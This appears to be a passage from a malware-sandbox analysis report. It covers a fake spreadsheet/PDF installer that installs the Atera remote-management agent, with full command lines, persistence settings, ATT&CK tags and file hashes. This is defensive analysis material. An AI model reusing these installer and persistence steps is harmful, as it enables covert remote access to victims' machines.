  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:2904
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:412
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\PlanilhaOrcamentoPDF.msi"
  2⤵
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5012
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\PlanilhaOrcamentoPDF.msi"
  2⤵
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID:6020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1084

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5572
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8B8A83FA45F5DFAA4E7202FCDF099D0B
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5668
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI31E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661187 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5728
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI3564.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661875 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5892
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI3A08.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240663078 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:6104
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI44FA.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240665890 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5948
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A68FD54DF8CDA32461A7EFD171627EFC E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5260
- - C:\Windows\SysWOW64\NET.exe
    "NET" STOP AteraAgent
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AteraAgent
      4⤵
      System Location Discovery: System Language Discovery
      PID:628
- - C:\Windows\SysWOW64\TaskKill.exe
    "TaskKill.exe" /f /im AteraAgent.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="[email protected]" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Nz1DFIAZ" /AgentId="8d4b063a-e4db-4969-abce-7736cdd44d69"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:4196
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BD087BD7CA34104EC4082E874A6D50B8
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2472
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2CB17B76DE73EBA326B7AD6796F8F9CD E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2636
- - C:\Windows\SysWOW64\NET.exe
    "NET" STOP AteraAgent
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AteraAgent
      4⤵
      System Location Discovery: System Language Discovery
      PID:1368
- - C:\Windows\SysWOW64\TaskKill.exe
    "TaskKill.exe" /f /im AteraAgent.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:5248
- C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="[email protected]" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Nz1DFIAZ" /AgentId=""
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Modifies system certificate store
  PID:4520

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5884
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
  2⤵
  - Launches sc.exe
  PID:5876
- C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 8d4b063a-e4db-4969-abce-7736cdd44d69 "7b27a9fe-6c5a-4f91-95ed-37582449099b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Nz1DFIAZ
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:3248

C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4908
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
  2⤵
  - Launches sc.exe
  PID:5772
- C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 8d4b063a-e4db-4969-abce-7736cdd44d69 "b120c0d1-1ae8-47ab-a681-91b079a5ea49" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Nz1DFIAZ
  2⤵
  - Executes dropped EXE
  PID:948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58314d.rbs

Filesize
8KB

MD5
1c45d273b429cc5b5f8eeea548e5341f

SHA1
9356cfe84a23001cfb1e940515bb88f54df50fd1

SHA256
664d96fb124fc3230b25ae8c5cb852868488d0f5dd2ea3e096f293ea2496f4cd

SHA512
06124a9094158763684cf6a6f21d6b3ac667cf9b933ca3732155408565ceb155f1e31f02ce5ea46436b81d8d104c80a107f672e20df90a63d2ba031945d2b21d

Download Submit
C:\Config.Msi\e58314f.rbs

Filesize
3KB

MD5
5bd879533eb46a8bc7a611e4b3919ef3

SHA1
ad902b06ecb0f917244420db95ac707e87d12b60

SHA256
be493870a7f83d9ed2041b9e6435b9b83abdc7e1b4ed5d712069b85dc976dd9e

SHA512
d49c8f70c19f1b344736d3f28ecca8c94dc7c670a759a77dc0a399bbbd315dac1014472615542c16fc51eb50ad5154d72b656b6ca4e501483cff3dc68cc60ccb

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

Filesize
1KB

MD5
89ebebc9e136e2e2d8e104ae8ca4207c

SHA1
333e67522cea1d92a1709219a1e964c8e384f7c7

SHA256
3c3aa140d971c7ecada419528401c8314704ac945aaf673f4f2cba954de7a437

SHA512
a68bf09a7192a14bb62455a3535d993fe0d9749bdfc54fcf8f3e4b53432aa775351ee159cab1b5d8211ef7036f146c86348d8feb1ddbf73a378fd31e5e054fe0

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

Filesize
1KB

MD5
4eacb8ed863fef6a3d09d47ad9c48e8d

SHA1
83ffd1497df662bc1573269a16d95b6ca24658a1

SHA256
e293ecc7970e6de799f3d6f521b06a54e76d08dbfadcddee539ab5fed82d745c

SHA512
cde41d36659f77f2596e77713ffdf2f1cb51f7550eee69c6512768448a1e26bdf29bf6dab6df27ff6d9d28e1a32518035c368a05781400525ddf93f76371b5a4

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Filesize
142KB

MD5
477293f80461713d51a98a24023d45e8

SHA1
e9aa4e6c514ee951665a7cd6f0b4a4c49146241d

SHA256
a96a0ba7998a6956c8073b6eff9306398cc03fb9866e4cabf0810a69bb2a43b2

SHA512
23f3bd44a5fb66be7fea3f7d6440742b657e4050b565c1f8f4684722502d46b68c9e54dcc2486e7de441482fcc6aa4ad54e94b1d73992eb5d070e2a17f35de2f

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

Filesize
1KB

MD5
b3bb71f9bb4de4236c26578a8fae2dcd

SHA1
1ad6a034ccfdce5e3a3ced93068aa216bd0c6e0e

SHA256
e505b08308622ad12d98e1c7a07e5dc619a2a00bcd4a5cbe04fe8b078bcf94a2

SHA512
fb6a46708d048a8f964839a514315b9c76659c8e1ab2cd8c5c5d8f312aa4fb628ab3ce5d23a793c41c13a2aa6a95106a47964dad72a5ecb8d035106fc5b7ba71

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

Filesize
693KB

MD5
2c4d25b7fbd1adfd4471052fa482af72

SHA1
fd6cd773d241b581e3c856f9e6cd06cb31a01407

SHA256
2a7a84768cc09a15362878b270371daad9872caacbbeebe7f30c4a7ed6c03ca7

SHA512
f7f94ec00435466db2fb535a490162b906d60a3cfa531a36c4c552183d62d58ccc9a6bb8bbfe39815844b0c3a861d3e1f1178e29dbcb6c09fa2e6ebbb7ab943a

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

Filesize
173KB

MD5
fd9df72620bca7c4d48bc105c89dffd2

SHA1
2e537e504704670b52ce775943f14bfbaf175c1b

SHA256
847d0cd49cce4975bafdeb67295ed7d2a3b059661560ca5e222544e9dfc5e760

SHA512
47228cbdba54cd4e747dba152feb76a42bfc6cd781054998a249b62dd0426c5e26854ce87b6373f213b4e538a62c08a89a488e719e2e763b7b968e77fbf4fc02

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

Filesize
588KB

MD5
17d74c03b6bcbcd88b46fcc58fc79a0d

SHA1
bc0316e11c119806907c058d62513eb8ce32288c

SHA256
13774cc16c1254752ea801538bfb9a9d1328f8b4dd3ff41760ac492a245fbb15

SHA512
f1457a8596a4d4f9b98a7dcb79f79885fa28bd7fc09a606ad3cd6f37d732ec7e334a64458e51e65d839ddfcdf20b8b5676267aa8ced0080e8cf81a1b2291f030

Download Submit
C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

Filesize
226B

MD5
6fa3611afce324b1cfee05619fe8c7a8

SHA1
b6280b18d38d638492fa1936a675519efdd2c040

SHA256
f5eac937fcc9083a8b844ec909d0c34f5528ab2830144dcc91136e24548124df

SHA512
1c368d7a69e193cc029a1637e6fca32e960b5ecc2647a05f5a4436aa82f9d4a4866749068b2455bdfdba8dfc49210147a5159f1c3ea1ecf9711a3467b05379f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

Filesize
471B

MD5
4dffcaea598ca9a7ac90c4ac4d896fce

SHA1
fb2a9089cacc45b01b8ec8073ce56542c3372162

SHA256
d2493f2955428ce9d1e90ead6467e43f57ac55d5db6b61f3ce5276025b73f9b9

SHA512
8d172aa0e7d56bcc253d6491f2982630bddea87a289fb492e57db93efb56f06e35897228ce23264913522f8d6fe7390f934f7d96afd41369a892c00adf9521d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

Filesize
727B

MD5
e7be7791d0c1baf7ab7110f5deac570e

SHA1
5eba5cde83647884b6f570bd39bbf0810493652e

SHA256
78ccc2eb627dfdf47fd133265205a563aa1b2557c986398bcb8cdad68a6964e4

SHA512
fd74f32588706358c5d226e38fc02a3cfdd1d22085fc75e35659ab2dd412c984b5b77077b4986ab9a536699ddf8bace8cb0ee3719eb210d44aa8e983cd1f9e84

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Filesize
727B

MD5
5a9f34d0bd7074d978bca26efee83cea

SHA1
ea74177ba4a9b12793dbbb410ae50020cd7eacee

SHA256
266cf7f825c8eca0893d2b344853f0a4fe06a48bf76fd2ed9b5c4ccfe9ab69bd

SHA512
e220822af425d92a377c1ad644754809e31a3426040473f7fd9b8d99a6db8a0a3238193d38be912bfdacd231f8485161c5d64c41f4b3ae76beeec734a294f6be

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

Filesize
400B

MD5
3110f85aae792e511561b0d64007d43f

SHA1
b369c2c29db8811ab2f3cc800c1507f523faf36b

SHA256
3eb4e8f794ff8613a389e91d9951885525eb37a84058fc095e52d513c2ef1013

SHA512
d921f8dc32ff9d564e732e0e57c1ea087b7825d6edebd8bac820824f1e28b7e17b7e29a68424c106982e926905df3da87a23100db09224011c396202b0bf175c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

Filesize
404B

MD5
d257712aca5e69244c1d28f53e7d2238

SHA1
3a218c8e24b02316d17f566ede9a76cb954dabd5

SHA256
8993268b5db3047f76e7675033fc963abbe51d4a72a873156d765a5630c7bd64

SHA512
579772d8f2539766aa0d37dad2e31d8494f8c60d54c1e352d17c791739fc460cfd006c3d3a075a3f3c878bc37fd3f41c3b094c6ae4b7bc4ed712ec7f263d0857

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Filesize
412B

MD5
ee260d8357bac487260b72e2433ec82c

SHA1
7c62a50b0e846f88ea905153ead53de5e86e484e

SHA256
2632407f0367d60f179bd7ec7e781ed4d2f143feca3728d0da1c2e1f81131861

SHA512
659d9d65674fd982426ad9ff4ac1278c50a15e6c1d2aad026da1f17e94328d1f7b13f3c3d6560d509cbbb449e90bc548e0c5b15bc0170be416da6633d82919e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Filesize
651B

MD5
9bbfe11735bac43a2ed1be18d0655fe2

SHA1
61141928bb248fd6e9cd5084a9db05a9b980fb3a

SHA256
549953bd4fc8acc868a9374ec684ebd9e7b23939adf551016f3433b642697b74

SHA512
a78c52b2ddc057dabf260eeb744b9f55eab3374ad96e1938a291d2b17f204a0d6e1aa02802de75f0b2cd6d156540d2ddee15e889b89d5e619207054df4c1d483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
295B

MD5
fd4c4684170fb9341b3b1fc581f7d8ef

SHA1
63d71196938c3b887b9e3e867138afb2bde69005

SHA256
8b0cf9f53e03c0c83d0f2179f8a9b368c25818ba25f260dd8f4980775005a66c

SHA512
56388b1755a9c1db4fa32200ceb23621d7fadde5d71f1290a7f6f3cb30d1f652def9292c982bc84cfa7b20d746c02b818c53d4a642cefe3aa10bdd0f77e99f3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b4441b28776eb365d4de18b6df7cbd2c

SHA1
f80926a932bb765d2890d86a1da0eb8ba1a33bd1

SHA256
5038aaf5c333d6245b2a1dc6e881bfa661dbe47545313665baeb759e0f78ca83

SHA512
f322008a29d3efc6dcf2592f989c025987207dfaad0baf4f905006b30c795c486ab3ee13ba12530cebbcd9cb139038cf70e850fa62852e1fa591f501f5e87ff5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6f6f21e5aa7448e4b655d4527bd8325c

SHA1
0b16916a711c8f4d33ab1d49f302c270030f99d2

SHA256
fbf3daf186f06af6c6a4f567a3842b7aeedc73d2f2c7ea29e95fe170a081fcd6

SHA512
b88feaab8899947c9f91b8ee17e778c9a94bc5cf1ddc563e2669b70a21c57d6f25fa99527b9016b046c6849b2904c0b2d93fc938adf9eb521584e784beb9e8bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
0c0c1dec9e4474bf31911a86f6bb9cf5

SHA1
6bb74871a90bdcbc7e88211c39f2ac952625c6c3

SHA256
91ce62f7a3888b31bbb2d0916006e526371dd2316815a90b0130d7c651dad754

SHA512
d75a2ce06bf19adda75cfdf996805f08a9d38eb4d9f263b368ae1044d17ce28fac6efa0285a43d4d63aee5e0a91804f3bacc40a6c5dcfb821aa0d1d64d14dc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
16dce6606b17990091363b84c160385a

SHA1
386d41d3256424fa2687b0c88d0e88e786a8e5a8

SHA256
6ac7c9c22a8397f2e5840b47de2e22941931b7e88ae958f3133f2f72ac84dfbe

SHA512
eba6fa8a757b06ab0e489d05a141b07ff4495dd467b211df7745cb161f0df5d5116beb09ddf5f0e551c7ed5bff27d197608fb96a2f8b4a6b70d6e81487c6de05

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 544843.crdownload

Filesize
2.9MB

MD5
f465b1fcc2a013c09b110466b7da2e4f

SHA1
b757d1147482c38be1b610f4a03bc9ae1dea6294

SHA256
c55e23d9367d422993d826a69644bbcb93175980af52a0c461b8f0240644cf06

SHA512
c30fde00fa73e56d5ac2b49c51429e7aafd9d12602a1059d1e6e472c18e59d21778e73d11578b81cfff8da7b2e9b4a62b84e6fb7c3a45fc5527970e92120e240

Download Submit
C:\Windows\Installer\MSI31E8.tmp

Filesize
509KB

MD5
88d29734f37bdcffd202eafcdd082f9d

SHA1
823b40d05a1cab06b857ed87451bf683fdd56a5e

SHA256
87c97269e2b68898be87b884cd6a21880e6f15336b1194713e12a2db45f1dccf

SHA512
1343ed80dccf0fa4e7ae837b68926619d734bc52785b586a4f4102d205497d2715f951d9acacc8c3e5434a94837820493173040dc90fb7339a34b6f3ef0288d0

Download Submit
C:\Windows\Installer\MSI31E8.tmp-\AlphaControlAgentInstallation.dll

Filesize
25KB

MD5
aa1b9c5c685173fad2dabebeb3171f01

SHA1
ed756b1760e563ce888276ff248c734b7dd851fb

SHA256
e44a6582cd3f84f4255d3c230e0a2c284e0cffa0ca5e62e4d749e089555494c7

SHA512
d3bfb4bd7e7fdb7159fbfc14056067c813ce52cdd91e885bdaac36820b5385fb70077bf58ec434d31a5a48245eb62b6794794618c73fe7953f79a4fc26592334

Download Submit
C:\Windows\Installer\MSI31E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Filesize
179KB

MD5
1a5caea6734fdd07caa514c3f3fb75da

SHA1
f070ac0d91bd337d7952abd1ddf19a737b94510c

SHA256
cf06d4ed4a8baf88c82d6c9ae0efc81c469de6da8788ab35f373b350a4b4cdca

SHA512
a22dd3b7cf1c2edcf5b540f3daa482268d8038d468b8f00ca623d1c254affbbc1446e5bd42adc3d8e274be3ba776b0034e179faccd9ac8612ccd75186d1e3bf1

Download Submit
C:\Windows\Installer\MSI3564.tmp-\CustomAction.config

Filesize
1KB

MD5
bc17e956cde8dd5425f2b2a68ed919f8

SHA1
5e3736331e9e2f6bf851e3355f31006ccd8caa99

SHA256
e4ff538599c2d8e898d7f90ccf74081192d5afa8040e6b6c180f3aa0f46ad2c5

SHA512
02090daf1d5226b33edaae80263431a7a5b35a2ece97f74f494cc138002211e71498d42c260395ed40aee8e4a40474b395690b8b24e4aee19f0231da7377a940

Download Submit
C:\Windows\Installer\MSI3564.tmp-\Newtonsoft.Json.dll

Filesize
695KB

MD5
715a1fbee4665e99e859eda667fe8034

SHA1
e13c6e4210043c4976dcdc447ea2b32854f70cc6

SHA256
c5c83bbc1741be6ff4c490c0aee34c162945423ec577c646538b2d21ce13199e

SHA512
bf9744ccb20f8205b2de39dbe79d34497b4d5c19b353d0f95e87ea7ef7fa1784aea87e10efcef11e4c90451eaa47a379204eb0533aa3018e378dd3511ce0e8ad

Download Submit
C:\Windows\Installer\MSI3BA1.tmp

Filesize
211KB

MD5
a3ae5d86ecf38db9427359ea37a5f646

SHA1
eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

SHA256
c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

SHA512
96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

Download Submit
\??\pipe\LOCAL\crashpad_1340_BCKLTPWEKKJXMWZG

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/3248-367-0x000001C3A55A0000-0x000001C3A55B6000-memory.dmp

Filesize
88KB

Download
memory/3248-363-0x000001C3A4C70000-0x000001C3A4CA0000-memory.dmp

Filesize
192KB

Download
